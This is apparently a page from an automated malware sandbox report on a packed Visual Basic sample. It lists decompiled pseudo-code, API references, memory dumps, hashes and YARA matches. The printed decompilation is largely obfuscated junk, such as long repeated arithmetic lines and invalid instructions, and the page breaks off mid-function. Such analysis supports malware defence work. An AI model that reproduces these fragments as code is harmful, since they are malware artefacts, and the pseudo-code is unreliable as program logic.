0x00420feb
0x00420ff3
0x00420ff8

APIs

__vbaChkstk.MSVBVM60(?,00401356), ref: 00420F3F

Part of subcall function 00421022: __vbaChkstk.MSVBVM60(?,00420F6E,?,?,?,?,00401356), ref: 00421028
Part of subcall function 00421022: #644.MSVBVM60(?,?,00420F6E,?,?,?,?,00401356), ref: 00421052

__vbaVarMove.MSVBVM60 ref: 00420F82
__vbaVarMove.MSVBVM60 ref: 00420F9B
__vbaVarIdiv.MSVBVM60(?,?,?), ref: 00420FAC
__vbaI4Var.MSVBVM60(00000000,?,?,?), ref: 00420FB2
__vbaFreeVar.MSVBVM60(00420FF9), ref: 00420FEB
__vbaFreeVar.MSVBVM60(00420FF9), ref: 00420FF3

Memory Dump Source

Source File: 00000001.00000002.870203334.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.870198729.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.870226387.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.870232976.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$ChkstkFreeMove$#644Idiv
String ID:
API String ID: 1258935826-0
Opcode ID: bacbef08d16ba2816045e41876e6b12bc5a435126d3f148ef8b2df48a3e69d00
Instruction ID: 9c9713102ab2519e1e788ac47f6b0e2f2053382cfd8a4e024bf79997c6cc0b40
Opcode Fuzzy Hash: bacbef08d16ba2816045e41876e6b12bc5a435126d3f148ef8b2df48a3e69d00
Instruction Fuzzy Hash: 6811EA71900208AFDB00EFD5C946BDEBBB8FF04704F50846AF406AB5A1D778AA05CB54

Uniqueness

Uniqueness Score: -1.00%

Function 004015A8, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 265
COMMON

Download Yara Rule

C-Code - Quality: 93%

			_entry_(signed int __eax, signed int __ebx, signed int __ecx, char __edx, signed int __edi, void* __esi) {
				signed int _t21;
				signed int _t22;
				signed char _t23;
				signed int _t27;
				signed int _t29;
				signed char _t31;
				signed int _t35;
				void* _t36;
				signed char _t38;

				_t29 = __ecx;
				_push("VB5!6&*"); // executed
				L004015A2(); // executed
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax ^ __eax;
				 *__eax =  *__eax + __eax;
				_t21 = __eax + 1;
				 *_t21 =  *_t21 + _t21;
				 *_t21 =  *_t21 + _t21;
				 *_t21 =  *_t21 + _t21;
				 *__ecx =  *__ecx + _t21;
				 *((char*)(__ebx + 0x63)) = __edx;
				_t22 = _t21 | 0x75ecaf4c;
				_t27 = __ebx & _t35 |  *(__edi + 0x5007 + __edi * 2);
				 *_t22 =  *_t22 + _t22;
				 *_t22 =  *_t22 + _t22;
				 *_t22 =  *_t22 + _t22;
				 *_t22 =  *_t22 + _t22;
				 *(__ecx + 0x73) =  *(__ecx + 0x73) & _t22;
				 *(__ecx + 0x6e) =  *(__ecx + 0x6e) & __ecx;
				_t31 = __edx + 1;
				_t38 = _t31;
				if(_t38 != 0) {
					L6:
					 *((intOrPtr*)(_t22 + _t22)) =  *((intOrPtr*)(_t22 + _t22)) + _t22;
					_t35 = _t35 - 1;
					goto L7;
				} else {
					if(_t38 != 0) {
						 *_t22 =  *_t22 + _t22;
						 *_t22 =  *_t22 + _t22;
						 *((intOrPtr*)(__esi + 0x16)) =  *((intOrPtr*)(__esi + 0x16)) + __ecx;
						 *_t22 =  *_t22 + _t22;
						if( *_t22 == 0) {
							 *_t22 =  *_t22 + _t22;
							goto L6;
						}
					} else {
						_push(0x73003661);
						asm("bound eax, [edx+0x70]");
						_t31 = _t31 ^  *(_t27 + 0x32);
						 *_t22 =  *_t22 + _t22;
						 *_t22 =  *_t22 + _t22;
						_t36 = _t36 - 1;
						 *_t22 =  *_t22 ^ _t22;
						asm("ror byte [ecx-0x34], cl");
						_t22 = 0xe7a55955;
						asm("invalid");
						if(__esi + 1 != 0) {
							asm("a16 mov edx, 0xfb574c67");
							_t31 = _t31 + 1;
							goto ( *__edi);
						}
						L7:
						_t29 = _t29 + 1;
						_push(_t35);
						 *0x54000401 =  *0x54000401 + _t29;
						asm("outsd");
						asm("outsb");
						_t22 =  *_t22 * 0x42000119;
					}
				}
				 *_t31 =  *_t31 + _t22;
				asm("adc eax, 0x746c0000");
				 *_t22 =  *_t22 + _t22;
				asm("adc eax, 0x0");
				 *_t22 =  *_t22 + _t22;
				_t23 = _t22 +  *_t22;
				 *_t23 =  *_t23 & _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 & _t23;
				 *_t23 =  *_t23 + _t23;
				 *[es:eax] =  *[es:eax] + _t23;
				 *_t23 =  *_t23 + _t31;
				asm("adc [eax], al");
				 *_t29 =  *_t29 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *((intOrPtr*)(_t23 + 4)) =  *((intOrPtr*)(_t23 + 4)) + _t29;
				 *_t23 =  *_t23 + _t23;
				asm("into");
				asm("adc [eax], al");
				 *_t23 =  *_t23 + _t29;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 & _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
			}

0x004015a8
0x004015a8
0x004015ad
0x004015b2
0x004015b4
0x004015b6
0x004015b8
0x004015ba
0x004015bc
0x004015bd
0x004015bf
0x004015c1
0x004015c3
0x004015c5
0x004015ca
0x004015cf
0x004015d6
0x004015d8
0x004015da
0x004015dc
0x004015de
0x004015e1
0x004015e4
0x004015e4
0x004015e5
0x00401659
0x00401659
0x0040165c
0x00000000
0x004015e7
0x004015e7
0x0040164c
0x0040164e
0x00401650
0x00401653
0x00401655
0x00401657
0x00000000
0x00401657
0x004015e9
0x004015e9
0x004015ee
0x004015f1
0x004015f4
0x004015f6
0x004015f8
0x004015fa
0x00401601
0x00401605
0x0040160a
0x0040160c
0x0040160e
0x00401617
0x00401618
0x00401618
0x0040165d
0x0040165d
0x0040165e
0x00401660
0x00401666
0x00401667
0x00401668
0x00401668
0x004015e7
0x0040166c
0x00401671
0x00401676
0x00401678
0x0040167e
0x00401680
0x00401682
0x00401684
0x00401686
0x00401688
0x0040168c
0x0040168e
0x00401691
0x00401693
0x00401695
0x00401697
0x00401699
0x0040169c
0x0040169e
0x0040169f
0x004016a1
0x004016a3
0x004016a5
0x004016a7
0x004016a9
0x004016ac
0x004016ae
0x004016b0
0x004016b2
0x004016b4
0x004016b6
0x004016b8
0x004016ba
0x004016bc
0x004016be
0x004016c0
0x004016c2
0x004016c4
0x004016c6
0x004016c8
0x004016ca
0x004016cc
0x004016ce
0x004016d0
0x004016d2
0x004016d4
0x004016d6
0x004016d8
0x004016da
0x004016dc
0x004016de
0x004016e0
0x004016e2
0x004016e4
0x004016e6
0x004016e8
0x004016ea
0x004016ec
0x004016ee
0x004016f0
0x004016f2
0x004016f4
0x004016f6
0x004016f8
0x004016fa
0x004016fc
0x004016fe
0x00401700
0x00401702
0x00401704
0x00401706
0x00401708
0x0040170a
0x0040170c
0x0040170e
0x00401710
0x00401712
0x00401714
0x00401716
0x00401718
0x0040171a
0x0040171c
0x0040171e
0x00401720
0x00401722
0x00401724
0x00401726
0x00401728
0x0040172a
0x0040172c
0x0040172e
0x00401730
0x00401732
0x00401734
0x00401736
0x00401738
0x0040173a
0x0040173c
0x0040173e
0x00401740
0x00401742
0x00401744
0x00401746
0x00401748
0x0040174a
0x0040174c
0x0040174e
0x00401750
0x00401752
0x00401754
0x00401756
0x00401758
0x0040175a
0x0040175c
0x0040175e
0x00401760
0x00401762
0x00401764
0x00401766
0x00401768
0x0040176a
0x0040176c
0x0040176e
0x00401770
0x00401772
0x00401774
0x00401776
0x00401778
0x0040177a
0x0040177c
0x0040177e
0x00401780
0x00401782
0x00401784
0x00401786
0x00401788
0x0040178a
0x0040178c
0x0040178e
0x00401790
0x00401792
0x00401794
0x00401796
0x00401798
0x0040179a
0x0040179c
0x0040179e
0x004017a0
0x004017a2
0x004017a4
0x004017a6
0x004017a8
0x004017aa
0x004017ac
0x004017ae
0x004017b0
0x004017b2
0x004017b4
0x004017b6
0x004017b8
0x004017ba
0x004017bc
0x004017be
0x004017c0
0x004017c2
0x004017c4
0x004017c6
0x004017c8
0x004017ca
0x004017cc
0x004017ce
0x004017d0
0x004017d2
0x004017d4
0x004017d6
0x004017d8
0x004017da
0x004017dc
0x004017de
0x004017e0
0x004017e2
0x004017e4
0x004017e6
0x004017e8
0x004017ea
0x004017ec
0x004017ed
0x004017ef
0x004017f1
0x004017f3
0x004017f5
0x004017f7
0x004017f9
0x004017fb
0x004017fd
0x004017ff
0x00401801
0x00401803
0x00401805
0x00401807
0x00401809
0x0040180b

APIs

#100.MSVBVM60(VB5!6&*), ref: 004015AD

Strings

VB5!6&*, xrefs: 004015A8

Memory Dump Source

Source File: 00000001.00000002.870203334.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.870198729.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.870226387.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.870232976.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: #100
String ID: VB5!6&*
API String ID: 1341478452-3593831657
Opcode ID: 86ad8d3de3c4ad2251ef7ae4bdb7b60b107b9028af470c2e1c4e08f975bcae54
Instruction ID: f25ce3f1a339cb80d5ff2df44d20c217d6f2508d8ec438f355dd598d1fd2f2a5
Opcode Fuzzy Hash: 86ad8d3de3c4ad2251ef7ae4bdb7b60b107b9028af470c2e1c4e08f975bcae54
Instruction Fuzzy Hash: 2B3166A294E3C24FD3034B7489666413FB09E63258B2E45EBC0C1DF5F3E26D994AC766

Uniqueness

Uniqueness Score: -1.00%

Function 00403A60, Relevance: 1.3, Strings: 1, Instructions: 8COMMON

Download Yara Rule

Strings

9@, xrefs: 00403A6B

Memory Dump Source

Source File: 00000001.00000002.870203334.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.870198729.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.870226387.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.870232976.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: 9@
API String ID: 0-2624149686
Opcode ID: c1c3ea8bbcbee23e47027b6f04984804e81ed56b957f5e2fa8d6ea77eb595aa9
Instruction ID: c937f778e41e8f1d992737086b265b0f5b93542b2faf84ff6652c3c879ab5c3c
Opcode Fuzzy Hash: c1c3ea8bbcbee23e47027b6f04984804e81ed56b957f5e2fa8d6ea77eb595aa9
Instruction Fuzzy Hash: D9B01220388201FAE2189AB95DC142415C892407C13604C33FC80F15D1C7FCCF00CB3D

Uniqueness

Uniqueness Score: -1.00%

Function 00403B58, Relevance: 1.3, Strings: 1, Instructions: 8COMMON

Download Yara Rule

Strings

9@, xrefs: 00403B63

Memory Dump Source

Source File: 00000001.00000002.870203334.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.870198729.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.870226387.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.870232976.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: 9@
API String ID: 0-2624149686
Opcode ID: c5dd765fbbdb2be7733b5fc9317e41963061a6fb21489f4a1b59020d5d97988d
Instruction ID: 211e5b0e44fbd10042ec25194676663ba026f37e7964d400f70f513f08696310
Opcode Fuzzy Hash: c5dd765fbbdb2be7733b5fc9317e41963061a6fb21489f4a1b59020d5d97988d
Instruction Fuzzy Hash: 39B01228384302FAE2149EBC5CC152175E4E200BC53B00C33F911E11E2C6FCEF00412D

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02224A6E, Relevance: 5.1, Strings: 3, Instructions: 1308COMMON

Download Yara Rule

Strings

b9,X, xrefs: 02219C5E
4y, xrefs: 0221A75A
|7, xrefs: 02224B76

Memory Dump Source

Source File: 00000001.00000002.870438121.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID:
String ID: 4y$b9,X$|7
API String ID: 0-1305033149
Opcode ID: 73eaa8efd76ce565263aa18426c141909337059277b8820ffa89d559d958bb65
Instruction ID: d93cdf7ff8a2e4b7e73aea3516e0c5dde9f27d6f3cc937b32709ca87154c9ca6
Opcode Fuzzy Hash: 73eaa8efd76ce565263aa18426c141909337059277b8820ffa89d559d958bb65
Instruction Fuzzy Hash: 70C23572614389DFDB34CF78CC84BDA7BE2AF55310F49822ADC898B259D3718A45CB52

Uniqueness

Uniqueness Score: -1.00%

Function 0221086F, Relevance: 3.3, Strings: 2, Instructions: 761COMMON

Download Yara Rule

Strings

b9,X, xrefs: 02219C5E
4y, xrefs: 0221A75A

Memory Dump Source

Source File: 00000001.00000002.870438121.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID:
String ID: 4y$b9,X
API String ID: 0-273544461
Opcode ID: ac2000e88d59540ffed0bf6bd988c33a0666a532f6e2fe101277f057018c36ae
Instruction ID: 4127ca9b86d76978b1ac2735bea40b92b449a12d8391f33855ae49ce3cf460fc
Opcode Fuzzy Hash: ac2000e88d59540ffed0bf6bd988c33a0666a532f6e2fe101277f057018c36ae
Instruction Fuzzy Hash: 82620EB2A14349DFDB749F69CC85BEA7BB2FF54310F45822ADC899B254D3708A81CB41

Uniqueness

Uniqueness Score: -1.00%

Function 0221E45E, Relevance: 2.8, Strings: 2, Instructions: 250COMMON

Download Yara Rule

Strings

@ M, xrefs: 0221EB35
JaP0, xrefs: 0221EB03

Memory Dump Source

Source File: 00000001.00000002.870438121.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID:
String ID: JaP0$@ M
API String ID: 0-3670451415
Opcode ID: 1df92e4b535557eb39c68ad4a1d3f60227885bac629e7f0771c0811614caa47c
Instruction ID: 865f94e969fd85d2ea4d3cc2f4d9567028cfa727d94d5b3492fd46ac9ee3ceaf
Opcode Fuzzy Hash: 1df92e4b535557eb39c68ad4a1d3f60227885bac629e7f0771c0811614caa47c
Instruction Fuzzy Hash: 44B18971514389DFDB34AEA5CD44BEE37F2AF54310F46842AED8A9B214E7318A84CB12

Uniqueness

Uniqueness Score: -1.00%

Function 02218E0F, Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.870438121.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c34aa963352f74053f6b8d4ff301ed70629f06eb07a36625da039addf584e58
Instruction ID: d39407a83447fcafd822805a6e57a2d85cfa2b6995e6c6b50dab66cdbb8d773b
Opcode Fuzzy Hash: 5c34aa963352f74053f6b8d4ff301ed70629f06eb07a36625da039addf584e58
Instruction Fuzzy Hash: 5931D6215187918BDF758FBC8CD4B81BBD06B16228F4983DECDA94A2DBE7354542C782

Uniqueness

Uniqueness Score: -1.00%

Function 004047F9, Relevance: .1, Instructions: 60
COMMONCrypto

Download Yara Rule

C-Code - Quality: 47%

			E004047F9(signed int __eax, void* __ecx, void* __fp0) {
				signed int _t26;
				void* _t27;
				void* _t38;
				void* _t39;
				signed int* _t40;

				_t26 = __eax;
				_t39 = _t38 - 1;
				asm("cmc");
				asm("hlt");
				if(_t39 < 0) {
					while(1) {
						_t26 = _t26 *  *(_t26 + 0x3c);
						asm("cmpsd");
						 *_t26 =  *_t26 + _t26;
						_t26 = _t26 + _t27;
						 *(_t39 + 0x38) =  *(_t39 + 0x38) ^ 0x00000000;
						asm("clc");
						 *_t40 =  *_t40 ^ 0x00000000;
						 *_t40 =  *_t40;
						 *_t40 =  *_t40 ^ 0x00000000;
						 *(_t39 + 0x38) =  *(_t39 + 0x38) ^ 0x00000000;
						asm("clc");
						asm("clc");
						 *(_t39 + 0x38) =  *(_t39 + 0x38) + 1;
						 *(_t39 + 0x38) =  *(_t39 + 0x38) - 1;
						asm("clc");
						 *(_t39 + 0x38) =  *(_t39 + 0x38);
						asm("cld");
						asm("clc");
						 *(_t39 + 0x38) =  *(_t39 + 0x38);
						asm("clc");
					}
				}
				__fp0 = __fp0 *  *(__eax + 0x586ebf5e);
				_t25 = __eax;
				__eax = __ebp;
				__ebp = _t25;
				__eax = __eax - 0xafc08418;
				__al = __al + 0xdd;
				asm("fdivr st0, st7");
				asm("in al, 0xe5");
				asm("fidiv word [edx]");
				asm("lahf");
				asm("out 0x4c, eax");
				goto 0x28c19624;
				_push(__eax);
				asm("a16 aaa");
				asm("adc ch, [ebp+0x27]");
				__ebp = 0xfda0989a;
				asm("aam 0x74");
				__edx = __edx + 1;
				 *0xFFFFFFFFFDA098D2 =  *((intOrPtr*)(0xfffffffffda098d2)) + 1;
				 *((intOrPtr*)(0xfffffffffda098d2)) =  *((intOrPtr*)(0xfffffffffda098d2)) - 1;
				asm("cld");
				return __eax;
			}

0x004047f9
0x004047f9
0x004047fa
0x004047fb
0x004047fc
0x00404784
0x00404784
0x00404733
0x00404734
0x00404736
0x0040473a
0x0040473e
0x0040473f
0x00404748
0x00404752
0x00404756
0x00404760
0x00404761
0x00404768
0x0040476b
0x0040476e
0x00404775
0x00404779
0x0040477a
0x0040477e
0x00404782
0x00404783
0x00404784
0x004047ff
0x00404806
0x00404806
0x00404806
0x00404807
0x0040480c
0x0040480e
0x00404811
0x00404813
0x00404815
0x00404816
0x00404818
0x0040481d
0x00404820
0x00404825
0x00404828
0x0040482d
0x004047cd
0x004047ce
0x004047d1
0x004047d4
0x004047d5

Memory Dump Source

Source File: 00000001.00000002.870203334.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.870198729.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.870226387.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.870232976.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55e1a9fd3e6f839c7cc72b2b5c32a79f8c39a74162db2b62167e10ae7c252240
Instruction ID: 491b4b9dde44485001565958589737bf4c05f33536d5fdbad166854ecd1e0118
Opcode Fuzzy Hash: 55e1a9fd3e6f839c7cc72b2b5c32a79f8c39a74162db2b62167e10ae7c252240
Instruction Fuzzy Hash: EF118F714092059FEBC95E71C49A79A3BB1FB40758FA2901EE48B534A1D7BC45C7CB81

Uniqueness

Uniqueness Score: -1.00%

Function 02219887, Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.870438121.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40c2618803589053f55816ba9a6fd9be8b8873c82e9bd6946d60cfa65539a003
Instruction ID: 4479c36b1e44255cf1e6279b400768407b2530c62b8dee3091155bc065ebfaba
Opcode Fuzzy Hash: 40c2618803589053f55816ba9a6fd9be8b8873c82e9bd6946d60cfa65539a003
Instruction Fuzzy Hash: C211A3B29182589FEBB4DE358A416DF77F2AF54204F46441DDCC9E6A14D3704AC5CF82

Uniqueness

Uniqueness Score: -1.00%

Function 02222FB6, Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.870438121.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1a4f8cc07697d2b8d6fcf02206e4df0b5e2a01ce1290f1035d340b6b6e3f402
Instruction ID: 6dbaef77acdf48038078dc3c1c1174dedceea73af8e8693b2d86a61fafa2a7b8
Opcode Fuzzy Hash: d1a4f8cc07697d2b8d6fcf02206e4df0b5e2a01ce1290f1035d340b6b6e3f402
Instruction Fuzzy Hash: 71118C31624255EFCB35DF98C880BDA73A6AF98320F5644AAE9098B264C775EA41CB10

Uniqueness

Uniqueness Score: -1.00%

Function 0221C8A3, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.870438121.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0ec8044d55284a10f5932728e6c4a76dbf9d83842d798d8e448099b51cb11e3
Instruction ID: a026a310f9d08bb1d858143eb29fddbf5fc3d9bc52f9beb0b7c2352c6f2dcf67
Opcode Fuzzy Hash: e0ec8044d55284a10f5932728e6c4a76dbf9d83842d798d8e448099b51cb11e3
Instruction Fuzzy Hash: CDB002B66515819FEF56DB08D591B4073A4FB55648B0904D0E412DB712D224E910CA04

Uniqueness

Uniqueness Score: -1.00%

Function 0221D12A, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.870438121.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9553b201f40634b3f0bfaa8b0557a5c34869809b08848db32634946b51e74d60
Instruction ID: f1647c15dfe5582e2114d8b48c9dc7a79c4e1b76aa7bcc19d5d00c5bce2ac4c7
Opcode Fuzzy Hash: 9553b201f40634b3f0bfaa8b0557a5c34869809b08848db32634946b51e74d60
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 022226C0, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.870438121.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 373647ac2c99fa3aff5c4a5c61970beea8832261957276e1707211cb39f397b7
Instruction ID: f40da618c707647688f81549d3f247e1d12bf4270ce338d1187cba2d8adaab6b
Opcode Fuzzy Hash: 373647ac2c99fa3aff5c4a5c61970beea8832261957276e1707211cb39f397b7
Instruction Fuzzy Hash: C4B09234322640CFC345CF1AC180F8173AABB80A10B814490F401CBA55C324ED808A00

Uniqueness

Uniqueness Score: -1.00%

Function 0041F6BD, Relevance: 91.4, APIs: 50, Strings: 2, Instructions: 369
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E0041F6BD(void* __ebx, void* __edi, void* __esi, void* _a24, signed int* _a28) {
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _v40;
				void* _v44;
				void* _v48;
				void* _v52;
				void* _v56;
				signed int _v60;
				char _v64;
				char _v68;
				intOrPtr _v76;
				char _v84;
				char _v100;
